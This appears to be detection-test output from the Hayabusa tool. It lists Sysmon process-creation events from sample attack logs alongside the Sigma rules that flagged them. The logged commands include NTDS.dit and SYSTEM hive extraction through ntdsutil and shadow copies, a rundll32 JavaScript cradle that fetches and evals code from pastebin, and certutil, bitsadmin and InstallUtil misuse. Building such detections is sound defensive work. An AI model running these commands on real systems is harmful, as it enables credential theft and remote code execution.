+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  create shadow /for=C:  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm  :  Path: C:\Windows\hh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe""   :  Path: C:\Users\IEUser\Downloads\UACBypass.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt  :  Path: C:\Windows\SysWOW64\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil  -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
